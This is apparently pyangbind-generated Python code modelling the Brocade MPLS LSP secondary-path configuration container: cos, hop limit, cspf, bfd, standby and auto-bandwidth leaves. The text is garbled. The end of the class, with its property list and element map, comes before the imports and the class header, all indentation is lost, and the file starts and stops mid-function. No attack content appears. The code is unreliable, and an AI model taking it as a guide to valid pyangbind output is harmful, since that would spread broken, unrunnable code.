'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_all = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_all(self):
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_secpath_soft_preemption(self):
"""
Getter method for secpath_soft_preemption, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_soft_preemption (empty)
"""
return self.__secpath_soft_preemption
def _set_secpath_soft_preemption(self, v, load=False):
"""
Setter method for secpath_soft_preemption, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_soft_preemption (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_soft_preemption is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_soft_preemption() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_soft_preemption must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_soft_preemption = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_soft_preemption(self):
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_secpath_auto_bandwidth(self):
"""
Getter method for lsp_secpath_auto_bandwidth, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_secpath_auto_bandwidth (container)
"""
return self.__lsp_secpath_auto_bandwidth
def _set_lsp_secpath_auto_bandwidth(self, v, load=False):
"""
Setter method for lsp_secpath_auto_bandwidth, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_secpath_auto_bandwidth (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_secpath_auto_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_secpath_auto_bandwidth() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_secpath_auto_bandwidth must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_secpath_auto_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_secpath_auto_bandwidth(self):
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
secpath_name = __builtin__.property(_get_secpath_name, _set_secpath_name)
secpath_standby = __builtin__.property(_get_secpath_standby, _set_secpath_standby)
secpath_bfd = __builtin__.property(_get_secpath_bfd, _set_secpath_bfd)
secpath_cspf = __builtin__.property(_get_secpath_cspf, _set_secpath_cspf)
secpath_ipmtu = __builtin__.property(_get_secpath_ipmtu, _set_secpath_ipmtu)
lsp_adaptive = __builtin__.property(_get_lsp_adaptive, _set_lsp_adaptive)
lsp_reoptimize_timer = __builtin__.property(_get_lsp_reoptimize_timer, _set_lsp_reoptimize_timer)
lsp_commit = __builtin__.property(_get_lsp_commit, _set_lsp_commit)
lsp_record = __builtin__.property(_get_lsp_record, _set_lsp_record)
lsp_cos = __builtin__.property(_get_lsp_cos, _set_lsp_cos)
lsp_hop_limit = __builtin__.property(_get_lsp_hop_limit, _set_lsp_hop_limit)
lsp_cspf_computation_mode = __builtin__.property(_get_lsp_cspf_computation_mode, _set_lsp_cspf_computation_mode)
lsp_traffic_engineering = __builtin__.property(_get_lsp_traffic_engineering, _set_lsp_traffic_engineering)
priority = __builtin__.property(_get_priority, _set_priority)
lsp_exclude_any = __builtin__.property(_get_lsp_exclude_any, _set_lsp_exclude_any)
lsp_include_any = __builtin__.property(_get_lsp_include_any, _set_lsp_include_any)
lsp_include_all = __builtin__.property(_get_lsp_include_all, _set_lsp_include_all)
secpath_soft_preemption = __builtin__.property(_get_secpath_soft_preemption, _set_secpath_soft_preemption)
lsp_secpath_auto_bandwidth = __builtin__.property(_get_lsp_secpath_auto_bandwidth, _set_lsp_secpath_auto_bandwidth)
_pyangbind_elements = {'secpath_name': secpath_name, 'secpath_standby': secpath_standby, 'secpath_bfd': secpath_bfd, 'secpath_cspf': secpath_cspf, 'secpath_ipmtu': secpath_ipmtu, 'lsp_adaptive': lsp_adaptive, 'lsp_reoptimize_timer': lsp_reoptimize_timer, 'lsp_commit': lsp_commit, 'lsp_record': lsp_record, 'lsp_cos': lsp_cos, 'lsp_hop_limit': lsp_hop_limit, 'lsp_cspf_computation_mode': lsp_cspf_computation_mode, 'lsp_traffic_engineering': lsp_traffic_engineering, 'priority': priority, 'lsp_exclude_any': lsp_exclude_any, 'lsp_include_any': lsp_include_any, 'lsp_include_all': lsp_include_all, 'secpath_soft_preemption': secpath_soft_preemption, 'lsp_secpath_auto_bandwidth': lsp_secpath_auto_bandwidth, }
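  # Minimal end-to-end sketch (assumption: this generated module is importable so
  # that `secondary_path` is in scope). The class is a plain PybindBase container,
  # so typical use is attribute assignment, with validation failures surfacing as
  # ValueError:
  #
  #   sp = secondary_path()
  #   sp.lsp_cos = 5                               # 0..7 per the restriction above
  #   sp.lsp_cspf_computation_mode = u'use-te-metric'
  #   print(sp._path())                            # YANG path of this node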
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import lsp_traffic_engineering
import priority
import lsp_secpath_auto_bandwidth
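# The class below is pyangbind-generated from the brocade-mpls YANG module; it
# models the /mpls-config/router/mpls/mpls-cmds-holder/lsp/secondary-path
# container, with one private YANGDynClass-backed slot per YANG leaf/container.
# The sibling imports above (lsp_traffic_engineering, priority,
# lsp_secpath_auto_bandwidth) are the generated modules for its child containers.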
class secondary_path(PybindBase):
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__secpath_name','__secpath_standby','__secpath_bfd','__secpath_cspf','__secpath_ipmtu','__lsp_adaptive','__lsp_reoptimize_timer','__lsp_commit','__lsp_record','__lsp_cos','__lsp_hop_limit','__lsp_cspf_computation_mode','__lsp_traffic_engineering','__priority','__lsp_exclude_any','__lsp_include_any','__lsp_include_all','__secpath_soft_preemption','__lsp_secpath_auto_bandwidth',)
_yang_name = 'secondary-path'
_rest_name = 'secondary-path'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-config', u'router', u'mpls', u'mpls-cmds-holder', u'lsp', u'secondary-path']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'mpls', u'lsp', u'secondary-path']
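  # Note (descriptive): _path() reports the full YANG data path while _rest_path()
  # reports the shorter REST/CLI path; both walk up through _parent when this node
  # is attached to a tree and fall back to the static lists above when standalone.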
def _get_secpath_name(self):
return self.__secpath_name
def _set_secpath_name(self, v, load=False):
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__secpath_name = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_name(self):
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
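  # Usage sketch (illustrative): secpath-name is the list key (is_keyval=True), so
  # once this container is a child of an instantiated list, _set_secpath_name
  # raises AttributeError; keys are fixed at list-entry creation time. Assuming a
  # standalone instance `sp`:
  #
  #   sp.secpath_name = u'to-pe2'   # allowed only while sp has no _parent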
def _get_secpath_standby(self):
return self.__secpath_standby
def _set_secpath_standby(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_standby must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_standby = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_standby(self):
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_bfd(self):
return self.__secpath_bfd
def _set_secpath_bfd(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_bfd must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_bfd(self):
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_cspf(self):
return self.__secpath_cspf
def _set_secpath_cspf(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_cspf must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__secpath_cspf = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_cspf(self):
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_secpath_ipmtu(self):
return self.__secpath_ipmtu
def _set_secpath_ipmtu(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
